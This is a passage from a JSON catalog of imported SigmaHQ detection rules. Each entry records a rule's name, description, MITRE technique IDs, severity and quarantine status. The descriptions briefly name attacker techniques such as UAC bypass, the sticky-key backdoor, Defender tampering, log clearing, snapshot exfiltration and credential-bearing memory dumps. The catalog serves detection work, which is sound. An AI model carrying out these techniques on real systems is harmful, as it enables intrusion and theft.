The \".sed\" extension stand for Self Extraction Directive files.\nThese files are used by the \"iexpress.exe\" utility in order to create self extracting packages.\nAttackers were seen abusing this utility and creating PE files with embedded \".sed\" entries.\nUsually \".sed\" files are simple ini files and not PE binaries.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-self-extraction-directive-file-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ab90dab8-c7da-4010-9193-563528cfa347", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_executable_detected/file_executable_detected_win_susp_embeded_sed_file.yml" } }, { "id": "sigmahq-sigma-ab9e3b40-0c85-4ba1-aede-455d226fd124", "type": "detection", "name": "Suspicious Redirection to Local Admin Share", "description": "Detects a suspicious output redirection to the local admins share, this technique is often found in malicious scripts or hacktool stagers", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1048" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-redirection-to-local-admin-share.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": 
"SigmaHQ/sigma", "source_id": "ab9e3b40-0c85-4ba1-aede-455d226fd124", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_redirect_local_admin_share.yml" } }, { "id": "sigmahq-sigma-aba15bdd-657f-422a-bab3-ac2d2a0d6f1c", "type": "detection", "name": "Potentially Suspicious DMP/HDMP File Creation", "description": "Detects the creation of a file with the \".dmp\"/\".hdmp\" extension by a shell or scripting application such as \"cmd\", \"powershell\", etc. Often created by software during a crash. Memory dumps can sometimes contain sensitive information such as credentials. It's best to determine the source of the crash.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-dmp-hdmp-file-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "aba15bdd-657f-422a-bab3-ac2d2a0d6f1c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_dump_file_susp_creation.yml" } }, { "id": "sigmahq-sigma-abae8fec-57bd-4f87-aff6-6e3db989843d", "type": "detection", "name": "AWS Snapshot Backup Exfiltration", "description": "Detects the modification of an EC2 snapshot's permissions to enable access from another account", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1537" 
], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/aws-snapshot-backup-exfiltration.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "abae8fec-57bd-4f87-aff6-6e3db989843d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_snapshot_backup_exfiltration.yml" } }, { "id": "sigmahq-sigma-ac175779-025a-4f12-98b0-acdaeb77ea85", "type": "detection", "name": "PowerShell Script Run in AppData", "description": "Detects a suspicious command line execution that invokes PowerShell with reference to an AppData folder", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-script-run-in-appdata.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ac175779-025a-4f12-98b0-acdaeb77ea85", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_susp_ps_appdata.yml" } }, { "id": "sigmahq-sigma-ac1c92b4-ac81-405a-9978-4604d78cc47e", "type": "detection", "name": "Potential Binary Proxy Execution Via VSDiagnostics.EXE", "description": "Detects execution of \"VSDiagnostics.exe\" with the \"start\" command in order to launch and proxy arbitrary 
binaries.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-binary-proxy-execution-via-vsdiagnostics-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ac1c92b4-ac81-405a-9978-4604d78cc47e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_vsdiagnostics_execution_proxy.yml" } }, { "id": "sigmahq-sigma-ac20ae82-8758-4f38-958e-b44a3140ca88", "type": "detection", "name": "Invoke-Obfuscation Via Use MSHTA", "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-via-use-mshta.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ac20ae82-8758-4f38-958e-b44a3140ca88", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml" } }, { "id": "sigmahq-sigma-ac7102b4-9e1e-4802-9b4f-17c5524c015c", "type": "detection", "name": "New PowerShell 
Instance Created", "description": "Detects the execution of PowerShell via the creation of a named pipe starting with PSHost", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-powershell-instance-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ac7102b4-9e1e-4802-9b4f-17c5524c015c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/pipe_created/pipe_created_powershell_execution_pipe.yml" } }, { "id": "sigmahq-sigma-ac8866c7-ce44-46fd-8c17-b24acff96ca8", "type": "detection", "name": "HybridConnectionManager Service Installation - Registry", "description": "Detects the installation of the Azure Hybrid Connection Manager service to allow remote code execution from Azure function.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1608" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hybridconnectionmanager-service-installation-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ac8866c7-ce44-46fd-8c17-b24acff96ca8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/registry/registry_event/registry_event_hybridconnectionmgr_svc_installation.yml" } }, { "id": "sigmahq-sigma-ac9159cc-c364-4304-8f0a-d63fc1a0aabb", "type": "detection", "name": "ClickOnce Trust Prompt Tampering", "description": "Detects changes to the ClickOnce trust prompt registry key in order to enable an installation from different locations such as the Internet.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/clickonce-trust-prompt-tampering.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ac9159cc-c364-4304-8f0a-d63fc1a0aabb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_clickonce_trust_prompt.yml" } }, { "id": "sigmahq-sigma-acd74772-5f88-45c7-956b-6a7b36c294d2", "type": "detection", "name": "Removal Of SD Value to Hide Schedule Task - Registry", "description": "Remove SD (Security Descriptor) value in \\Schedule\\TaskCache\\Tree registry hive to hide schedule task. 
This technique is used by Tarrask malware", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/removal-of-sd-value-to-hide-schedule-task-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "acd74772-5f88-45c7-956b-6a7b36c294d2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml" } }, { "id": "sigmahq-sigma-ace3ff54-e7fd-46bd-8ea0-74b49a0aca1d", "type": "detection", "name": "Remote Schedule Task Lateral Movement via ITaskSchedulerService", "description": "Detects remote RPC calls to create or execute a scheduled task", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1053", "T1053.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-schedule-task-lateral-movement-via-itaskschedulerservice.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ace3ff54-e7fd-46bd-8ea0-74b49a0aca1d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/rpc_firewall/rpc_firewall_itaskschedulerservice_lateral_movement.yml" } 
}, { "id": "sigmahq-sigma-acf61bd8-d814-4272-81f0-a7a269aa69aa", "type": "detection", "name": "Indicator Removal on Host - Clear Mac System Logs", "description": "Detects deletion of local audit logs", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685.006" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/indicator-removal-on-host-clear-mac-system-logs.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "acf61bd8-d814-4272-81f0-a7a269aa69aa", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_clear_system_logs.yml" } }, { "id": "sigmahq-sigma-acfa2210-0d71-4eeb-b477-afab494d596c", "type": "detection", "name": "Windows Service Terminated With Error", "description": "Detects Windows services that got terminated for whatever reason", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-service-terminated-with-error.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "acfa2210-0d71-4eeb-b477-afab494d596c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/builtin/system/service_control_manager/win_system_service_terminated_error_generic.yml" } }, { "id": "sigmahq-sigma-ad1f4bb9-8dfb-4765-adb6-2a7cfb6c0f94", "type": "detection", "name": "Suspicious WSMAN Provider Image Loads", "description": "Detects signs of potential use of the WSMAN provider from uncommon processes, both locally and during remote execution.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1021.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-wsman-provider-image-loads.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ad1f4bb9-8dfb-4765-adb6-2a7cfb6c0f94", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_wsman_provider_image_load.yml" } }, { "id": "sigmahq-sigma-ad691d92-15f2-4181-9aa4-723c74f9ddc3", "type": "detection", "name": "Potential Defense Evasion Via Right-to-Left Override", "description": "Detects the presence of the \"U+202E\" (RIGHT-TO-LEFT OVERRIDE) character, which causes a terminal, browser, or operating system to render the following text in right-to-left order.\nThis character is used as an obfuscation and masquerading technique by adversaries to disguise a file's real extension and trick users into opening malicious files.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1036.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/potential-defense-evasion-via-right-to-left-override.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ad691d92-15f2-4181-9aa4-723c74f9ddc3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_right_to_left_override.yml" } }, { "id": "sigmahq-sigma-ad720b90-25ad-43ff-9b5e-5c841facc8e5", "type": "detection", "name": "User Added to Local Administrators Group", "description": "Detects addition of users to the local administrator group via \"Net\" or \"Add-LocalGroupMember\".", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/user-added-to-local-administrators-group.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ad720b90-25ad-43ff-9b5e-5c841facc8e5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_add_user_local_admin_group.yml" } }, { "id": "sigmahq-sigma-ad87d14e-7599-4633-ba81-aeb60cfe8cd6", "type": "detection", "name": "Azure Application Gateway Modified or Deleted", "description": "Identifies when a application gateway is modified or deleted.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": 
[], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-application-gateway-modified-or-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ad87d14e-7599-4633-ba81-aeb60cfe8cd6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/activity_logs/azure_application_gateway_modified_or_deleted.yml" } }, { "id": "sigmahq-sigma-ad89044a-8f49-4673-9a55-cbd88a1b374f", "type": "detection", "name": "Enabling COR Profiler Environment Variables", "description": "Detects .NET Framework CLR and .NET Core CLR \"cor_enable_profiling\" and \"cor_profiler\" variables being set and configured.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.012" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/enabling-cor-profiler-environment-variables.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ad89044a-8f49-4673-9a55-cbd88a1b374f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_enabling_cor_profiler_env_variables.yml" } }, { "id": "sigmahq-sigma-ad9012a6-e518-4432-9890-f3b82b8fc71f", "type": "detection", "name": "Potential Sidecar Injection Into Running Deployment", "description": "Detects attempts to inject a 
sidecar container into a running deployment.\nA sidecar container is an additional container within a pod, that resides alongside the main container.\nOne way to add containers to running resources like Deployments/DeamonSets/StatefulSets, is via a \"kubectl patch\" operation.\nBy injecting a new container within a legitimate pod, an attacker can run their code and hide their activity, instead of running their own separated pod in the cluster.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1609" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-sidecar-injection-into-running-deployment.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ad9012a6-e518-4432-9890-f3b82b8fc71f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/kubernetes/audit/kubernetes_audit_sidecar_injection.yml" } }, { "id": "sigmahq-sigma-ad92e3f9-7eb6-460e-96b1-582b0ccbb980", "type": "detection", "name": "UAC Bypass Using MSConfig Token Modification - Process", "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uac-bypass-using-msconfig-token-modification-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC 
engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ad92e3f9-7eb6-460e-96b1-582b0ccbb980", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_uac_bypass_msconfig_gui.yml" } }, { "id": "sigmahq-sigma-ada3bc4f-f0fd-42b9-ba91-e105e8af7342", "type": "detection", "name": "Server Side Template Injection Strings", "description": "Detects server-side template injection (SSTI) attempt strings sent via GET requests, as recorded in web server access logs", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1221" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/server-side-template-injection-strings.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ada3bc4f-f0fd-42b9-ba91-e105e8af7342", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/web/webserver_generic/web_ssti_in_access_logs.yml" } }, { "id": "sigmahq-sigma-ada4b0c4-758b-46ac-9033-9004613a150d", "type": "detection", "name": "Modify Group Policy Settings", "description": "Detects malicious modifications of Group Policy settings, which can be used to implement many other malicious behaviors.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1484.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/modify-group-policy-settings.yaml", "quarantine_reason": "imported rule; 
upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ada4b0c4-758b-46ac-9033-9004613a150d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_reg_modify_group_policy_settings.yml" } }, { "id": "sigmahq-sigma-adc9bcc4-c39c-4f6b-a711-1884017bf043", "type": "detection", "name": "Network Sniffing - MacOs", "description": "Detects the usage of tooling to sniff network traffic.\nAn adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1040" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/network-sniffing-macos.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "adc9bcc4-c39c-4f6b-a711-1884017bf043", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_network_sniffing.yml" } }, { "id": "sigmahq-sigma-add64136-62e5-48ea-807e-88638d02df1e", "type": "detection", "name": "Fsutil Suspicious Invocation", "description": "Detects suspicious parameters of fsutil (deleting USN journal, configuring it with small size, etc).\nMight be used by ransomwares during the attack (seen by NotPetya and others).", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": 
"high", "category": "endpoint", "mitre_techniques": [ "T1070", "T1485" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/fsutil-suspicious-invocation.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "add64136-62e5-48ea-807e-88638d02df1e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_fsutil_usage.yml" } }, { "id": "sigmahq-sigma-adf876b3-f1f8-4aa9-a4e4-a64106feec06", "type": "detection", "name": "Testing Usage of Uncommonly Used Port", "description": "Adversaries may communicate using a protocol and port paring that are typically not associated.\nFor example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1571" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/testing-usage-of-uncommonly-used-port.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "adf876b3-f1f8-4aa9-a4e4-a64106feec06", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_test_netconnection.yml" } }, { "id": "sigmahq-sigma-adf9f4d2-559e-4f5c-95be-c28dff0b1476", "type": "detection", "name": "New Country", "description": "Detects sign-ins from new countries. 
The detection considers past activity locations to determine new and infrequent locations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-country.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "adf9f4d2-559e-4f5c-95be-c28dff0b1476", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/identity_protection/azure_identity_protection_new_coutry_region.yml" } }, { "id": "sigmahq-sigma-ae02ed70-11aa-4a22-b397-c0d0e8f6ea99", "type": "detection", "name": "Unusual File Download From File Sharing Websites - File Stream", "description": "Detects the download of suspicious file type from a well-known file and paste sharing domain", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1564.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/unusual-file-download-from-file-sharing-websites-file-stream.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ae02ed70-11aa-4a22-b397-c0d0e8f6ea99", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/create_stream_hash/create_stream_hash_file_sharing_domains_download_unusual_extension.yml" } }, { "id": "sigmahq-sigma-ae215552-081e-44c7-805f-be16f975c8a2", "type": "detection", "name": "Suspicious Debugger Registration Cmdline", "description": "Detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor).", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1546.008" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-debugger-registration-cmdline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ae215552-081e-44c7-805f-be16f975c8a2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_registry_install_reg_debugger_backdoor.yml" } }, { "id": "sigmahq-sigma-ae2bdd58-0681-48ac-be7f-58ab4e593458", "type": "detection", "name": "Tamper Windows Defender Remove-MpPreference - ScriptBlockLogging", "description": "Detects attempts to remove Windows Defender configuration using the 'MpPreference' cmdlet", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/tamper-windows-defender-remove-mppreference-scriptblocklogging.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { 
